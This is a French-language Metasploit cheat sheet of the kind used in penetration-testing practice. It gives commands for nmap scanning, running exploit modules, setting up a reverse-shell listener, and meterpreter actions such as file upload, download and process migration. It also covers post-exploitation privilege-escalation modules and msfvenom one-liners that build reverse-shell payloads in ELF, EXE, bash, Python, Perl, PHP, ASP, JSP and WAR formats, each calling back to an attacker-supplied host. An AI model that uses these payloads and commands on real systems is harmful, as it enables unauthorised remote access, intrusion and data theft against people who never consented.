Cheat sheet – Metasploit

Lancer nmap dans metasploit:
msf5 > db_nmap -A [IP]

Il est possible faire des traitement sur les résultats du nmap.
Par exemple la commande service donne tout les services détectés par nmap:
msf5 > service [IP]

Rechercher une vulnérabilité:
msf5 > search [service]

Utiliser un module:
msf5 > use [/nom/du/script]

Voir les infos du module:
msf5 exploit(nom/du/script) > show info

Modifier un paramètre (LHOST, LPORT …):
msf5 exploit(nom/du/script) > set [PARAMETRE] [VARIABLE]

Lancer le script:
msf5 exploit(nom/du/script) > run

Pour Ouvrir un port en écoute:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost [IP]
msf5 exploit(multi/handler) > set lport [PORT]
msf5 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp (liste des payload avec show payload)
msf5 exploit(multi/handler) > run

Commande dans le meterpreter:
shell : obtenir un shell
getuid : Obtenir le nom de l'utilisateur qui execute le shell
sysinfo : Obtenir des information sur le systeme et sur le meterpreter
upload : upload un fichier via le metterpreter
download : download un fichier via le metterpreter
lls /lcd : lister et changer de repertoire en local quand un metterpreter est ouvert
backgroud : mettre le metterpreter en backgroud

Migrer de processus:
Si le metterpreter n'est pas stable il faut migrer de processus
En utilisant un module POST : post/windows/manage/migrate

ou alors avec la commande ps et migrate:

meterpreter > ps
meterpreter > migrate [PID]

Utilisation de modules de POST exploitation:
post/multi/recon/local_exploit_suggester --> Liste les faille probable pour l'elevation de privilège sur windows

Générer des payloads avec msfvenom:

Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f elf > file.elf

Windows :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > file.exe

Pour Bash :
msfvenom -p cmd/unix/reverse_bash LHOST=[IP]LPORT=[PORT] -f raw > file.sh

Pour Python:
msfvenom -p cmd/unix/reverse_python LHOST=[IP] LPORT=[PORT] -f raw > file.py

Pour Perl :
msfvenom -p cmd/unix/reverse_perl LHOST=[IP] LPORT=[PORT] -f raw > file.pl

Générer un fichier .php :
msfvenom -p php/meterpreter_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > file.php

Générer un fichier.asp :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f asp > file.asp

Générer un fichier .jsp :
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > file.jsp

Générer un fichier .aspx :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f aspx > file.aspx

Générer un fichier .war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f war > file.war